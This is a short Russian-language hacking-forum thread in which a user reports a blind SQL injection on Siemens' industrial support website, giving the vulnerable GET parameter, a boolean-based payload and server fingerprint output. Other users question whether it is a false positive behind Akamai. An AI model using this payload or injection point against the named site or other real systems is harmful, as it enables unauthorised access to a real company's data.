• XSS.stack #1 – первый литературный журнал от юзеров форума

support.industry.siemens.com sql-injection

Ul0rix

HDD-drive
Пользователь
Регистрация
16.06.2019
Сообщения
45
Реакции
373
Была найдена sql inj на сайте техподдержки продукции Siemens.




Код:
Parameter: dti (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: dti=-1195 OR 6900=6900
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: IBM DB2
 
Пожалуйста, обратите внимание, что пользователь заблокирован
nice shot.
 
пруф ф студию! ))

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
IBM DB2 - субд, хотя сервер на аспе и винде, логично предположить шо там MSSQL стоит скорее всего + акамай, а на нём булиан фолсит и ошибка 403. Был аналогичный случай только на другом сайте, отправил им по фану репорт на хакер ван, ответ был следующий: Это фолс позитив, СУБД не MySQL(хотя скульмап выдал именно его) и тоже стоял акамай
 
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
IBM DB2 - субд, хотя сервер на аспе и винде, логично предположить шо там MSSQL стоит скорее всего + акамай, а на нём булиан фолсит и ошибка 403. Был аналогичный случай только на другом сайте, отправил им по фану репорт на хакер ван, ответ был следующий: Это фолс позитив, СУБД не MySQL(хотя скульмап выдал именно его) и тоже стоял акамай
интереснинько, однако =)

у мну были кейсы, когды стояле именна мускуль и дб2, а таг же дб2 который... принимал данные с мсскл! (wtf зочем, но факт).

потму и спросил)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх